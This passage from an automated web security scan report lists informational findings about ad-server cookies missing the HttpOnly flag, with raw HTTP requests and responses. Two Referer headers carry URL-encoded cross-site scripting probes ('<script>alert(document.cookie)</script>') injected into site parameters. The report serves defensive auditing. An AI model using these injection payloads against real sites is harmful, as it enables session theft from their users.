Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/ads.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

uid=3011330574290390485; Domain=.turn.com; Expires=Sun, 24-Jul-2011 01:35:43 GMT; Path=/
adImpCount=uSIG8d80kGSu-3LVteb8dYo27UqqnCnwkfrXKyAV6Vld6ISB_q_vS5rapRhLZ6kjS6LzB--IPpW7f2lvGgmbV44a2HHwK-7WUoZJXI4UNi7dHrH8JOOm_45w1VVsmbQ-LO5mu_1bsdW1DTvfN8mMduV530E-cnnyNakd9XAJ5pw; Domain=.turn.com; Expires=Sun, 24-Jul-2011 01:35:43 GMT; Path=/
fc=1WiKwfBkd2IP9DmYEvBTXecjeUUpq7AdXdV5QaZ3XbQBKx4ZZQvbzWrTNs9TlBo5BZ0EL66upofk3HmGTS_1gr3wc-cQ7FRKnITKYzO3zYV52dhK4dSErN9-EcLOAtq0; Domain=.turn.com; Expires=Sun, 24-Jul-2011 01:35:43 GMT; Path=/
pf=ZNcym7VfDvuGzV9XuIE1r-QUWOHC4vVDwY-zzeE9S_KJwV9kSIzX4BtZ7vBDkFqiRgnA1fZrADJXYuYVL1y1CX4lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; Domain=.turn.com; Expires=Sun, 24-Jul-2011 01:35:43 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.192. http://ad.yieldmanager.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

bh="b!!!#%!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!-?2!!!!#<ie@S!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!L(*!!!!#<h67=!!`Yp!!!!#<htUb!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!ys+!!!!$<h2ED!###_!!!!#<j?lI!##lo!!!!#<jbO@!#$=X!!!!#<gj@R!#*VS!!!!#<jLPe!#-vv!!!!$<iC/K!#0$b!!!!%<hu%0!#2`q!!!!#<jc#g!#3pS!!!!#<jHAu!#3pv!!!!#<jHAu!#5(V!!!!#<jHAu!#5(X!!!!#<jLPe!#5(]!!!!#<jLPe!#5(`!!!!#<jLPe!#7(x!!!!#<ie@S!#8:i!!!!#<jc#c!#:dW!!!!#<gj@R!#<T3!!!!#<jbNC!#C-Y!!!!#<iC/U!#Kbb!!!!#<jLP/!#MP0!!!!#<jLPe!#PrV!!!!#<iC/U!#SjO!!!!#<gj@R!#SqW!!!!#<gj@R!#U5p!!!!#<gj@R!#W^8!!!!#<jem(!#X)y!!!!#<jem(!#ZPo!!!!#<ie2`!#ZhT!!!!#<ie@S!#]!g!!!!#<gj@R!#]Ky!!!!#<gj@R!#`SX!!!!#<gj@R!#a0h!!!!#<ie2`!#a=#!!!!#<iC/U!#av4!!!!#<iLQl!#b<[!!!!#<jHAu!#b<]!!!!#<jLPi!#b<^!!!!#<jHAu!#b<d!!!!#<jLPi!#b<f!!!!#<jLPe!#b<h!!!!#<jHAu!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b<w!!!!#<jHAu!#b<x!!!!#<jLPe!#b=J!!!!#<jLPi!#b](!!!!#<gj@R!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#c%+!!!!#<iC/U!#c8D!!!!#<gj@R!#cC!!!!!#<ie2`!#ePa!!!!#<gj@R!#eR5!!!!#<gj@R!#eVe!!!!#<jHAu!#ec+!!!!#<ie2`!#ec,!!!!#<iJoK!#f93!!!!#<gj@R!#fBu!!!!#<gj@R!#fJ/!!!!#<gj@R!#fJw!!!!#<gj@R!#fK9!!!!#<gj@R!#fK>!!!!#<gj@R!#g'E!!!!#<gj@R!#g<%!!!!#<gj@R!#gRx!!!!#<htU3!#l)E!!!!#<iC/U!#mOI!!!!#<k0fB"; path=/; expires=Wed, 23-Jan-2013 21:07:10 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?adv=60652&code=AS17&t=2&rnd=1327772520 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/10?ret=html&phint=pageName%3Dunknown&phint=pageRequestID%3D427D360F-AD19-8945-2CEDA65620083A33&phint=affiliateGroupName%3DSearch%20Engine%20Optimization%20Project&phint=affiliateName%3DSEO%20DTS%20-%20Google%20ABTL%2013148&phint=campaign%3D13148&phint=__bk_t%3DBuy%20your%20next%20new%20or%20used%20car%20online%20with%20our%20New%20Car%20Pricing%20Guides%2C%20Car%20Reviews%2C%20Vehicle%20Comparisons%20and%20Used%20Car%20Inventory%20services.%20%7C%20Autobytel.com&phint=__bk_k%3DPricing%2CGuide%2Cbuy%20a%20new%20car%2Cbuy%20a%20used%20auto%2Cnew%20auto%2Cused%20auto%2Cnew%20car%2Cused%20car%2Cnew%20car%20pricing%2Cused%20car%20pricing%2Cdealer%2Clocal%20dealer%2C%20new%20car%20inventory%2C%20used%20car%20inventory&limit=10&r=42794077
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=2c382b2c-154d-11e0-8090-001e6849f405&_hmacv=1&_salt=2076931618&_keyid=k1&_hmac=deb36388c0462f4f1745f3224a27addc34e20c73; pc1="b!!!!#!#49P!!!*Z!##wb!+:d(!$9rJ!!H<)!?5%!)I-X?![:Z-!#[Q#!%(/.~~~~~~<ht]%~M.jTN"; BX=90d0t1d6iq2v7&b=3&s=9e; ih="b!!!!0!+/Wc!!!!#<jbN?!+:d(!!!!#<htX7!+:d=!!!!$<hu%0!+kS,!!!!#<jbO@!->h]!!!!#<htSD!.N)i!!!!#<htgq!.`.U!!!!#<jHA_!/H]-!!!!'<hu!d!/J`3!!!!#<jbND!/c)/!!!!#<h67=!/o:O!!!!#<htU#!/poZ!!!!#<iLQk!/uG1!!!!#<jbOF"; pv1="b!!!!%!#1xy!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@~~!#1y'!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@<l_ss~!#M*E!!E)$!$XwU!/uG1!%:2w!#:m1!?5%!'2gi6!xSD7!%4=%!%@78!'>cr~~~~~<jbOF<ka5`~"; bh="b!!!#$!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!-?2!!!!#<ie@S!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!L(*!!!!#<h67=!!`Yp!!!!#<htUb!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!ys+!!!!$<h2ED!###_!!!!#<j?lI!##lo!!!!#<jbO@!#$=X!!!!#<gj@R!#*VS!!!!#<jLPe!#-vv!!!!$<iC/K!#0$b!!!!%<hu%0!#2`q!!!!#<jc#g!#3pS!!!!#<jHAu!#3pv!!!!#<jHAu!#5(V!!!!#<jHAu!#5(X!!!!#<jLPe!#5(]!!!!#<jLPe!#5(`!!!!#<jLPe!#7(x!!!!#<ie@S!#8:i!!!!#<jc#c!#:dW!!!!#<gj@R!#<T3!!!!#<jbNC!#C-Y!!!!#<iC/U!#Kbb!!!!#<jLP/!#MP0!!!!#<jLPe!#PrV!!!!#<iC/U!#SjO!!!!#<gj@R!#SqW!!!!#<gj@R!#U5p!!!!#<gj@R!#W^8!!!!#<jem(!#X)y!!!!#<jem(!#ZPo!!!!#<ie2`!#ZhT!!!!#<ie@S!#]!g!!!!#<gj@R!#]Ky!!!!#<gj@R!#`SX!!!!#<gj@R!#a0h!!!!#<ie2`!#a=#!!!!#<iC/U!#av4!!!!#<iLQl!#b<[!!!!#<jHAu!#b<]!!!!#<jLPi!#b<^!!!!#<jHAu!#b<d!!!!#<jLPi!#b<f!!!!#<jLPe!#b<h!!!!#<jHAu!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b<w!!!!#<jHAu!#b<x!!!!#<jLPe!#b=J!!!!#<jLPi!#b](!!!!#<gj@R!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#c%+!!!!#<iC/U!#c8D!!!!#<gj@R!#cC!!!!!#<ie2`!#ePa!!!!#<gj@R!#eR5!!!!#<gj@R!#eVe!!!!#<jHAu!#ec+!!!!#<ie2`!#ec,!!!!#<iJoK!#f93!!!!#<gj@R!#fBu!!!!#<gj@R!#fJ/!!!!#<gj@R!#fJw!!!!#<gj@R!#fK9!!!!#<gj@R!#fK>!!!!#<gj@R!#g'E!!!!#<gj@R!#g<%!!!!#<gj@R!#gRx!!!!#<htU3!#l)E!!!!#<iC/U"

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:07:10 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: bh="b!!!#%!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!-?2!!!!#<ie@S!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!L(*!!!!#<h67=!!`Yp!!!!#<htUb!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!ys+!!!!$<h2ED!###_!!!!#<j?lI!##lo!!!!#<jbO@!#$=X!!!!#<gj@R!#*VS!!!!#<jLPe!#-vv!!!!$<iC/K!#0$b!!!!%<hu%0!#2`q!!!!#<jc#g!#3pS!!!!#<jHAu!#3pv!!!!#<jHAu!#5(V!!!!#<jHAu!#5(X!!!!#<jLPe!#5(]!!!!#<jLPe!#5(`!!!!#<jLPe!#7(x!!!!#<ie@S!#8:i!!!!#<jc#c!#:dW!!!!#<gj@R!#<T3!!!!#<jbNC!#C-Y!!!!#<iC/U!#Kbb!!!!#<jLP/!#MP0!!!!#<jLPe!#PrV!!!!#<iC/U!#SjO!!!!#<gj@R!#SqW!!!!#<gj@R!#U5p!!!!#<gj@R!#W^8!!!!#<jem(!#X)y!!!!#<jem(!#ZPo!!!!#<ie2`!#ZhT!!!!#<ie@S!#]!g!!!!#<gj@R!#]Ky!!!!#<gj@R!#`SX!!!!#<gj@R!#a0h!!!!#<ie2`!#a=#!!!!#<iC/U!#av4!!!!#<iLQl!#b<[!!!!#<jHAu!#b<]!!!!#<jLPi!#b<^!!!!#<jHAu!#b<d!!!!#<jLPi!#b<f!!!!#<jLPe!#b<h!!!!#<jHAu!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b<w!!!!#<jHAu!#b<x!!!!#<jLPe!#b=J!!!!#<jLPi!#b](!!!!#<gj@R!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#c%+!!!!#<iC/U!#c8D!!!!#<gj@R!#cC!!!!!#<ie2`!#ePa!!!!#<gj@R!#eR5!!!!#<gj@R!#eVe!!!!#<jHAu!#ec+!!!!#<ie2`!#ec,!!!!#<iJoK!#f93!!!!#<gj@R!#fBu!!!!#<gj@R!#fJ/!!!!#<gj@R!#fJw!!!!#<gj@R!#fK9!!!!#<gj@R!#fK>!!!!#<gj@R!#g'E!!!!#<gj@R!#g<%!!!!#<gj@R!#gRx!!!!#<htU3!#l)E!!!!#<iC/U!#mOI!!!!#<k0fB"; path=/; expires=Wed, 23-Jan-2013 21:07:10 GMT
Cache-Control: no-store
Last-Modified: Mon, 24 Jan 2011 21:07:10 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;

14.193. http://ad.yieldmanager.com/unpixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/unpixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

bh="b!!!#J!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!-?2!!!!$<k3BW!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0!j!!!!#<k3BW!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1CD!!!!#<k2yw!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!4<u!!!!#<k3BW!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!?VS!!ErC<k0fB!!J>N!!!!#<k2yx!!KNF!!ErC<k0fB!!L(*!!!!#<h67=!!Mr(!!ErC<k0fB!!`Yp!!!!#<htUb!!iEb!!!!#<k3BW!!iF_~~!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!y]X!!!!#<k11E!!ys+!!!!$<h2ED!###_!!!!#<j?lI!##lo!!!!#<jbO@!#$=X!!!!#<gj@R!#')-!!!!#<k2yx!#(mB!!!!#<k11E!#*VS!!!!#<jLPe!#-vv!!!!$<iC/K!#/yX!!!!#<k2yx!#0$b!!!!%<hu%0!#15#!!ErC<k0fB!#15$!!ErC<k0fB!#2`q!!!!#<jc#g!#3pS!!!!#<jHAu!#3pv!!!!#<jHAu!#3pw!!!!#<k11E!#5(V!!!!#<jHAu!#5(X!!!!#<jLPe!#5(]!!!!#<jLPe!#5(`!!!!#<jLPe!#5m!!!!!#<k2yx!#5mH!!!!#<k2yx!#7(x!!!!$<k3BW!#8:i!!!!#<jc#c!#8A2!!!!#<k11E!#:dW!!!!#<gj@R!#<T3!!!!#<jbNC!#C-Y!!!!#<iC/U!#Kbb!!!!#<jLP/!#LI/!!!!#<k2yw!#LI0!!!!#<k2yw!#MP0!!!!#<jLPe!#PrV!!!!#<iC/U!#SjO!!!!#<gj@R!#SqW!!!!#<gj@R!#T#d!!!!#<k2yx!#U5p!!!!#<gj@R!#UAO!!!!#<k2yx!#W^8!!!!#<jem(!#X)y!!!!#<jem(!#ZPo!!!!#<ie2`!#ZhT!!!!$<k3BW!#]!g!!!!#<gj@R!#]Ky!!!!#<gj@R!#`SX!!!!#<gj@R!#a0h!!!!#<ie2`!#a=#!!!!#<iC/U!#av4!!!!#<iLQl!#b<[!!!!#<jHAu!#b<]!!!!#<jLPi!#b<^!!!!#<jHAu!#b<d!!!!#<jLPi!#b<f!!!!#<jLPe!#b<h!!!!#<jHAu!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b<w!!!!#<jHAu!#b<x!!!!#<jLPe!#b=J!!!!#<jLPi!#b](!!!!#<gj@R!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#c%+!!!!#<iC/U!#c8D!!!!#<gj@R!#cC!!!!!#<ie2`!#ePa!!!!#<gj@R!#eR5!!!!#<gj@R!#eVe!!!!#<jHAu!#ec+!!!!#<ie2`!#ec,!!!!#<iJoK!#elE!!!!#<k3!!!#f93!!!!#<gj@R!#fBj!!!!#<k3BW!#fBk!!!!#<k3BW!#fBm!!!!#<k3BW!#fBn!!!!#<k3BW!#fBu!!!!#<gj@R!#fG+!!!!#<k3BW!#fJ/!!!!#<gj@R!#fJw!!!!#<gj@R!#fK9!!!!#<gj@R!#fK>!!!!#<gj@R!#fdu!!!!#<k2yx!#g'E!!!!#<gj@R!#g<%!!!!#<gj@R!#gRx!!!!#<htU3!#h.N!!!!#<k11E!#l)E!!!!#<iC/U!#ndJ!!!!#<k2yx!#ndP!!!!#<k2yx!#nda!!!!#<k2yx!#ne$!!!!#<k2yx!#p]T!!!!#<k11E"; path=/; expires=Thu, 24-Jan-2013 02:19:11 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /unpixel?id=494248&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.autocheck.com/?WT.mc_id=1824&siteID=182471a71%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6dab831a574
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=2c382b2c-154d-11e0-8090-001e6849f405&_hmacv=1&_salt=2076931618&_keyid=k1&_hmac=deb36388c0462f4f1745f3224a27addc34e20c73; pc1="b!!!!#!#49P!!!*Z!##wb!+:d(!$9rJ!!H<)!?5%!)I-X?![:Z-!#[Q#!%(/.~~~~~~<ht]%~M.jTN"; BX=90d0t1d6iq2v7&b=3&s=9e; ih="b!!!!0!+/Wc!!!!#<jbN?!+:d(!!!!#<htX7!+:d=!!!!$<hu%0!+kS,!!!!#<jbO@!->h]!!!!#<htSD!.N)i!!!!#<htgq!.`.U!!!!#<jHA_!/H]-!!!!'<hu!d!/J`3!!!!#<jbND!/c)/!!!!#<h67=!/o:O!!!!#<htU#!/poZ!!!!#<iLQk!/uG1!!!!#<jbOF"; pv1="b!!!!%!#1xy!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@~~!#1y'!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@<l_ss~!#M*E!!E)$!$XwU!/uG1!%:2w!#:m1!?5%!'2gi6!xSD7!%4=%!%@78!'>cr~~~~~<jbOF<ka5`~"; bh="b!!!#I!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!-?2!!!!$<k3BW!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0!j!!!!#<k3BW!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1CD!!!!#<k2yw!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!4<u!!!!#<k3BW!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!?VS!!ErC<k0fB!!J>N!!!!#<k2yx!!KNF!!ErC<k0fB!!L(*!!!!#<h67=!!Mr(!!ErC<k0fB!!`Yp!!!!#<htUb!!iEb!!!!#<k3BW!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!y]X!!!!#<k11E!!ys+!!!!$<h2ED!###_!!!!#<j?lI!##lo!!!!#<jbO@!#$=X!!!!#<gj@R!#')-!!!!#<k2yx!#(mB!!!!#<k11E!#*VS!!!!#<jLPe!#-vv!!!!$<iC/K!#/yX!!!!#<k2yx!#0$b!!!!%<hu%0!#15#!!ErC<k0fB!#15$!!ErC<k0fB!#2`q!!!!#<jc#g!#3pS!!!!#<jHAu!#3pv!!!!#<jHAu!#3pw!!!!#<k11E!#5(V!!!!#<jHAu!#5(X!!!!#<jLPe!#5(]!!!!#<jLPe!#5(`!!!!#<jLPe!#5m!!!!!#<k2yx!#5mH!!!!#<k2yx!#7(x!!!!$<k3BW!#8:i!!!!#<jc#c!#8A2!!!!#<k11E!#:dW!!!!#<gj@R!#<T3!!!!#<jbNC!#C-Y!!!!#<iC/U!#Kbb!!!!#<jLP/!#LI/!!!!#<k2yw!#LI0!!!!#<k2yw!#MP0!!!!#<jLPe!#PrV!!!!#<iC/U!#SjO!!!!#<gj@R!#SqW!!!!#<gj@R!#T#d!!!!#<k2yx!#U5p!!!!#<gj@R!#UAO!!!!#<k2yx!#W^8!!!!#<jem(!#X)y!!!!#<jem(!#ZPo!!!!#<ie2`!#ZhT!!!!$<k3BW!#]!g!!!!#<gj@R!#]Ky!!!!#<gj@R!#`SX!!!!#<gj@R!#a0h!!!!#<ie2`!#a=#!!!!#<iC/U!#av4!!!!#<iLQl!#b<[!!!!#<jHAu!#b<]!!!!#<jLPi!#b<^!!!!#<jHAu!#b<d!!!!#<jLPi!#b<f!!!!#<jLPe!#b<h!!!!#<jHAu!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b<w!!!!#<jHAu!#b<x!!!!#<jLPe!#b=J!!!!#<jLPi!#b](!!!!#<gj@R!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#c%+!!!!#<iC/U!#c8D!!!!#<gj@R!#cC!!!!!#<ie2`!#ePa!!!!#<gj@R!#eR5!!!!#<gj@R!#eVe!!!!#<jHAu!#ec+!!!!#<ie2`!#ec,!!!!#<iJoK!#elE!!!!#<k3!!!#f93!!!!#<gj@R!#fBj!!!!#<k3BW!#fBk!!!!#<k3BW!#fBm!!!!#<k3BW!#fBn!!!!#<k3BW!#fBu!!!!#<gj@R!#fG+!!!!#<k3BW!#fJ/!!!!#<gj@R!#fJw!!!!#<gj@R!#fK9!!!!#<gj@R!#fK>!!!!#<gj@R!#fdu!!!!#<k2yx!#g'E!!!!#<gj@R!#g<%!!!!#<gj@R!#gRx!!!!#<htU3!#h.N!!!!#<k11E!#l)E!!!!#<iC/U!#ndJ!!!!#<k2yx!#ndP!!!!#<k2yx!#nda!!!!#<k2yx!#ne$!!!!#<k2yx!#p]T!!!!#<k11E"

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:19:11 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: bh="b!!!#J!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!-?2!!!!$<k3BW!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0!j!!!!#<k3BW!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1CD!!!!#<k2yw!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!4<u!!!!#<k3BW!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!?VS!!ErC<k0fB!!J>N!!!!#<k2yx!!KNF!!ErC<k0fB!!L(*!!!!#<h67=!!Mr(!!ErC<k0fB!!`Yp!!!!#<htUb!!iEb!!!!#<k3BW!!iF_~~!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!y]X!!!!#<k11E!!ys+!!!!$<h2ED!###_!!!!#<j?lI!##lo!!!!#<jbO@!#$=X!!!!#<gj@R!#')-!!!!#<k2yx!#(mB!!!!#<k11E!#*VS!!!!#<jLPe!#-vv!!!!$<iC/K!#/yX!!!!#<k2yx!#0$b!!!!%<hu%0!#15#!!ErC<k0fB!#15$!!ErC<k0fB!#2`q!!!!#<jc#g!#3pS!!!!#<jHAu!#3pv!!!!#<jHAu!#3pw!!!!#<k11E!#5(V!!!!#<jHAu!#5(X!!!!#<jLPe!#5(]!!!!#<jLPe!#5(`!!!!#<jLPe!#5m!!!!!#<k2yx!#5mH!!!!#<k2yx!#7(x!!!!$<k3BW!#8:i!!!!#<jc#c!#8A2!!!!#<k11E!#:dW!!!!#<gj@R!#<T3!!!!#<jbNC!#C-Y!!!!#<iC/U!#Kbb!!!!#<jLP/!#LI/!!!!#<k2yw!#LI0!!!!#<k2yw!#MP0!!!!#<jLPe!#PrV!!!!#<iC/U!#SjO!!!!#<gj@R!#SqW!!!!#<gj@R!#T#d!!!!#<k2yx!#U5p!!!!#<gj@R!#UAO!!!!#<k2yx!#W^8!!!!#<jem(!#X)y!!!!#<jem(!#ZPo!!!!#<ie2`!#ZhT!!!!$<k3BW!#]!g!!!!#<gj@R!#]Ky!!!!#<gj@R!#`SX!!!!#<gj@R!#a0h!!!!#<ie2`!#a=#!!!!#<iC/U!#av4!!!!#<iLQl!#b<[!!!!#<jHAu!#b<]!!!!#<jLPi!#b<^!!!!#<jHAu!#b<d!!!!#<jLPi!#b<f!!!!#<jLPe!#b<h!!!!#<jHAu!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b<w!!!!#<jHAu!#b<x!!!!#<jLPe!#b=J!!!!#<jLPi!#b](!!!!#<gj@R!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#c%+!!!!#<iC/U!#c8D!!!!#<gj@R!#cC!!!!!#<ie2`!#ePa!!!!#<gj@R!#eR5!!!!#<gj@R!#eVe!!!!#<jHAu!#ec+!!!!#<ie2`!#ec,!!!!#<iJoK!#elE!!!!#<k3!!!#f93!!!!#<gj@R!#fBj!!!!#<k3BW!#fBk!!!!#<k3BW!#fBm!!!!#<k3BW!#fBn!!!!#<k3BW!#fBu!!!!#<gj@R!#fG+!!!!#<k3BW!#fJ/!!!!#<gj@R!#fJw!!!!#<gj@R!#fK9!!!!#<gj@R!#fK>!!!!#<gj@R!#fdu!!!!#<k2yx!#g'E!!!!#<gj@R!#g<%!!!!#<gj@R!#gRx!!!!#<htU3!#h.N!!!!#<k11E!#l)E!!!!#<iC/U!#ndJ!!!!#<k2yx!#ndP!!!!#<k2yx!#nda!!!!#<k2yx!#ne$!!!!#<k2yx!#p]T!!!!#<k11E"; path=/; expires=Thu, 24-Jan-2013 02:19:11 GMT
Cache-Control: no-store
Last-Modified: Tue, 25 Jan 2011 02:19:11 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;

14.194. http://ads.adbrite.com/adserver/behavioral-data/8201 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.adbrite.com
Path:	/adserver/behavioral-data/8201

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ut=1%3Aq1YqM1KyqlbKTq0szy9KKVayUsotTzQprDHMLja3sKwxrTE0z9dJzsiwSC%2BoysmrMczJSS%2BqqjGsMYAJZuUgCSrpKCUl5uWlFmWCjVKqrQUA; Domain=.adbrite.com; Expires=Thu, 21-Jan-2021 21:07:11 GMT; Path=/
vsd="0@1@4d3de9ff@loadus.exelator.com"; Version=1; Domain=.adbrite.com; Max-Age=172800; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.195. http://ads.dailystar.com.lb/www/delivery/afr.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.dailystar.com.lb
Path:	/www/delivery/afr.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

OAID=69cbb92020bcada4c658c1886472c417; expires=Tue, 24-Jan-2012 21:11:11 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /www/delivery/afr.php?zoneid=45&cb=456 HTTP/1.1
Host: ads.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:11:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=69cbb92020bcada4c658c1886472c417; expires=Tue, 24-Jan-2012 21:11:11 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 1304

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...

14.196. http://ads.dailystar.com.lb/www/delivery/ck.php previous next

Summary

Severity:	Information
